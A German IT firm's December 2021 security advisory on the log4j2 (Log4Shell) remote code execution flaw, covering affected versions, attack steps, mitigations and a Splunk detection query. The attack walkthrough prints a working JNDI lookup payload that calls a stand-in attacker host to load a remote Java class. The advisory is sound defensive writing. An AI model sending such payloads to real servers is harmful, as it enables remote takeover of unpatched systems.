•  
    • Bewirb dich jetzt!
    •  
      • Start
      • Leistungsprofil
        Leistungsprofil
        • IT-Infrastruktur
          IT-Infrastruktur
          • Beratung
          • Lösungen
            Lösungen
            • Storage und Backup
            • IT- & Organisations-Check
            • Log- und Eventmanagement
            • Netzwerk
            • Virtualisierung
            • Applikationen
            • Microsoft 365
          • Branchen
          • Kompetenzen
        • IT-Security
          IT-Security
          • Beratung
          • Lösungen
            Lösungen
            • Prozessorientiertes ISMS
            • IT-Security Check
            • Awareness-Schulung
            • Zugangsmanagement
            • Gateway
            • Endgeräte
            • Verschlüsselung
            • Schwachstellenmanagement
          • Branchen
          • Kompetenzen
        • IT-Service
          IT-Service
          • Lösungen
            Lösungen
            • IT-Dokumentation
            • IT-Monitoring
            • Schnittstellentechnologie
          • Kompetenzen
          • Kunden
        • ISMS und BCMS
          ISMS und BCMS
          • Lösungen
            Lösungen
            • Informationssicherheits-managementsystem (ISMS)
            • Informationssicherheits-Risikomanagement
            • Business Continuity Management (BCM)
            • Tool für prozessintegriertes Managementsystem
            • Sicherheitskonzepte und Sicherheitsrichtlinien
          • Branchen und Kunden
          • Kompetenzen
        • Support- und Managed Services
          Support- und Managed Services
          • Beratung
          • Lösungen
            Lösungen
            • SHD User Help Desk
            • Cloud Backup
              Cloud & Managed Services
              • Self-Service
              • Virtualisierung
              • Full-Service
            • IT- & Organisations-Check
            • Basisunterstützung
            • Betriebsunterstützung
            • Betriebsverantwortung
            • Cloud-Strategie
          • Kompetenzen
          • Kunden
        • Digitalisierung von Prozessen
          Digitalisierung von Prozessen
          • Beratung
          • Lösungen
            Lösungen
            • Digitales Wachstumspaket
            • Investitionsmanagement
            • Prozessdokumentation
            • HR: E-Recruiting
            • Kaufmännische Prüfung
            • Rechnungseingang
            • HR: Fehlzeitenmanagement
          • Branchen
          • Kompetenzen
          • Kunden
        • Branchenspezifische IT-Lösungen
          Branchenspezifische IT-Lösungen
          • Healthcare
            Healthcare
            • KHZG
            • ISMS
          • Energie & Versorgung
          • Öffentliche Verwaltung
          • Transport & Logistik
          • Industrie & Handel
          • Automotive
        • Branchenspezifische IT-Lösungen
          • Healthcare
          • Energie & Versorgung
          • Öffentliche Verwaltung
          • Transport & Logistik
          • Industrie & Handel
          • Automotive
      • Über SHD
        Über SHD
        • Entwicklung
        • Standorte
        • Partnerschaften
        • Engagement
      • Referenzen
      • Aktuelles
        Aktuelles
        • News
        • Veranstaltungen
        • Fachartikel
        • Podcast
      • Karriere
        Karriere
        • Bewerbungsprozess
        • Stellenangebote
          Stellenangebote
          • Einsteiger
          • Erfahrene
          • Schüler & Studenten
        • Jobs, die begeistern!
          Jobs, die begeistern!
          • Senior System Engineer
          • Softwareentwickler
          • IT-Consultant / Project Manager
          • BPM Consultant
          • Technology Consultant
          • Service Manager im Helpdesk
      • Kontakt
        Kontakt
        • Ansprechpartner
     
    • Startseite
    • Aktuelles
    •   
    • Schwachstelle in der Java-Logging-Bibliothek "log4j2"

    13.12.2021

    Schwachstelle in der Java-Logging-Bibliothek "log4j2"

    Am vergangenen Freitag war anscheinend mal wieder Zeit für einen #zeroday, der die nächsten Tage viele Organisationen und sicher auch einige SE's auf Trab halten wird. In der beliebten Java-Logging-Bibliothek "log4j2" steckt ein beängstigend einfach ausnutzbarer Fehler. Dieser führt durch das Logging eines bestimmten Strings zu Remote Code Execution (RCE).

    Wer ist betroffen?

    Systeme und Dienste, die die Java-Logging-Bibliothek Apache log4j2 zwischen den Versionen 2.0 und 2.14.1 verwenden. Dazu gehören viele in Java geschriebene Anwendungen und Dienste. Hier eine kurze Auflistung der derzeit verwundbaren Dienste (Herstellerliste): gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

    Was passiert jetzt genau?

    Es reicht im Endeffekt, das Zielsystem dazu zubringen, einen String zu loggen. Dies kann interaktiv aus der Applikation heraus erfolgen oder per GET über das Internet. Man nutzt hierfür das "JNDI - Java Naming and Directory Interface" und bedient sich dabei seiner Lookup-Funktionalität.

    Schritte:

    1. Daten vom Benutzer werden an den Server gesendet (über ein beliebiges Protokoll)
    2. Der Server protokolliert die Daten in der Anfrage, die den schädlichen String enthalten: ${jndi:ldap://attacker.com/a} (wobei attacker.com ein von einem Angreifer kontrollierter Server ist)
    3. Die log4j-Schwachstelle wird durch diesen String ausgelöst und der Server stellt eine Anfrage an attacker.com über "Java Naming and Directory Interface" (JNDI),
    4. Diese Antwort enthält einen Pfad zu einer entfernten Java-Klassendatei (z. B. second-stage.attacker.com/Exploit.class), die in den Serverprozess eingefügt wird.

    5. Dieser injizierte Payload löst eine zweite Stufe aus und ermöglicht einem Angreifer, beliebigen Code auszuführen.

    Wie schütze ich mich?

    Patchen Sie Ihre Systeme und updaten Sie die betroffene Bibliothek mindestens auf Version "og4j-2.15.0-rc2". Central Repository: org/apache/logging/log4j/log4j-core/2.15.0 (maven.org)

    Wenn patchen nicht möglich ist:

    • Für Log4j 2.10 oder höher: Fügen Sie -Dlog4j.formatMsgNoLookups=true als Befehlszeilenoption hinzu oder fügen Sie log4j.formatMsgNoLookups=true zur Datei log4j2.component.properties im Klassenpfad hinzu, um Nachschlagen in Protokollereignismeldungen zu verhindern.
    • Für Log4j 2.7 oder höher: Geben Sie %m{nolookups} in der PatternLayout-Konfiguration an, um Nachschlagen in Protokollereignismeldungen zu verhindern.
    • Entfernen Sie die Klassen JndiLookup und JndiManager aus dem log4j-core-JAR. Beachten Sie, dass das Entfernen von JndiManager dazu führt, dass der JndiContextSelector und der JMSAppender nicht funktionieren.

    Splunk Search:

    • index=* "jndi"
    • | rex field=_raw ".*\$\{\w+[^\"\d](\w+|\d+|W+|\s+\S+)\W+\/(?P<BadIP>\d+\d.\d+.\d+.\d+:\d+)"
    • | rex field=_raw ".*\$\{\w+[^\"\d](\w+|\d+|W+|\s+\S+)\W+\/(?P<BadURL>\S+\.\w+/\w+)"
    • | rex field=_raw ".*(?<exploit>\$\{jndi[^\"]*})"
    • | table _time index src_ip BadIP BadURL exploit _raw
    • | fillnull value="N/A"
    • | dedup src_ip BadIP BadURL exploit
    • | sort - _time

    IOC:

    • IP Adressen: gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

    • Exploit Payloads: gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890

    Quick Fix

    Cyberreason hat hier einen "Fix" bereitgestellt, der sich der grundlegenden Schwachstelle bedient. Systeme welche nicht gepatcht werden können, da ein Neustart nicht möglich ist o.ä. - kann sich diesem Fix bedienen. Sollten aber zeitnah gepatcht werden!

    Wie arbeitet der "Fix"?

    Der Server wird ebenfalls über den Vector "${jndi:ldap://...." angesprochen, statt aber Schadcode nachzuladen, wird auf dem Zielsystem das Lookup "Feature" deaktiviert. Dies ist als schnelle Hilfe zu verstehen und ersetzt kein komplettes patchen der Systeme! Anbei der Link zu GIT Repo: github.com/Cybereason/Logout4Shell

    Autor: Daniel Amlung, System Engineer und Experte für Virtualisierung, Logging und Security bei SHD


    weitere Beiträge:

    SHD erhält erneut das Bonitätszertifikat von ..
    SHD unterstützt den Tanzsportklub Residenz Dr..


    Alle News
    • News
    • Veranstaltungen
    • Fachartikel
    • Podcast

    Veranstaltungen

    07.02.2023 - 07.02.2023 |
    SHD bewegt: Cyber-Resilienz

    weitere

    Ansprechpartner

    Daniel Amlung

    Daniel Amlung System Engineer

    Drescherhäuser 5b, 01159 Dresden
    Tel.: +49 (351) 42 32-0

     
     
     
    SHD - Standorte
    <strong>SHD Geschäftsstelle Hamburg</strong><br />Kontaktinformationen<strong>SHD Geschäftsstelle Berlin</strong><br />Kontaktinformationen<strong>SHD Geschäftsstelle Lausitz</strong><br />Kontaktinformationen<strong>SHD Geschäftsstelle Leipzig</strong><br />Kontaktinformationen<strong>SHD Geschäftsstelle Nürnberg</strong><br />Kontaktinformationen<strong>SHD Hauptsitz Dresden</strong><br />KontaktinformationenSHD-StandorteCompass Gruppe
    Zertifizierungen

    SHD ist zertifiziert nach ISO 9001 und ISO 27001

    Social Media
    •  
    •  
    •  
    •  
    •  
    •  
    •  
    Portfolio
    • IT-Infrastruktur
    • IT-Security
    • IT-Service
    • ISMS und BCMS
    • Support- und Managed Services
    • Digitalisierung von Prozessen
    Kundenmagazin

    Alles Wichtige aus IT-Welt und SHD auf einen Blick

    SHD-News abonnieren

    © 2023 SHD System-Haus-Dresden GmbH
    • Start
    • Datenschutzinformation
    • Datenschutzinformation: Social-Media-Präsenzen
    • Sitemap
    • Impressum
    • Kontakt

    Schön, dass Sie sich für unser Angebot interessieren!

    Dürfen wir Ihnen regelmäßig interessante Neuigkeiten zu aktuellen IT-Themen senden?

    Newsletter abonnieren

    Schon von unserem Podcast gehört?

    Mit 'IT aufs Ohr' immer über aktuelle IT-Trends informiert sein.

    Podcast abonnieren

    Consent-Einstellungen